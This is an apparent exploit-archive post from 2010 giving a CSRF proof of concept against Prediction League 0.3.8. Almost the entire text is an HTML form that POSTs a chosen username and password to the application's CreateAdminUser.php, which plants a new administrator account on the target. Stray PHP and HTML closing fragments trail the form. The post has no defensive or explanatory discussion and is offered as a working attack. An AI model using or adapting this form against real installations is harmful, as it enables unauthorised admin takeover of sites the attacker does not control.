Prediction League 0.3.8 CSRF Create Admin User Exploit
Posted on 04 April 2010
====================================================== Prediction League 0.3.8 CSRF Create Admin User Exploit ====================================================== ======================================================================================== | # Title : Prediction League 0.3.8 CSRF Create Admin User Exploit | # Author : indoushka | # Home : www.iqs3cur1ty.com/vb | # Tested on: Lunix Fran?ais v.(9.4 Ubuntu) | # Bug : CSRF Create Admin User Exploit ====================== Exploit By indoushka ================================= # Exploit : <form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php"> <table> <tr> <td class="TBLHEAD" colspan="3" align="CENTER"> <font class="TBLHEAD"> Admin User Administration </font> </td> </tr> <tr> <td class="TBLROW"> <font class="TBLROW"> Admin User Name </font> </td> <td class="TBLROW"> <font class="TBLROW"> <input type="TEXT" size="20" name="USER" value=""> </font> </td> <td class="TBLROW"> <font class="TBLROW"> The name for the admin user. </font> </td> </tr> <tr> <td class="TBLROW"> <font class="TBLROW"> Password </font> </td> <td class="TBLROW"> <font class="TBLROW"> <input type="TEXT" size="20" name="PASSWORD"> </font> </td> <td class="TBLROW"> <font class="TBLROW"> The password for the admin user. </font> </td> </tr> <tr> <td colspan="3" class="TBLROW" align="CENTER"> <input type="SUBMIT" NAME="CREATE" VALUE="CREATE"> </td> </tr> </table> </form> <?php } ?> </body> </html> # Inj3ct0r.com [2010-04-04]
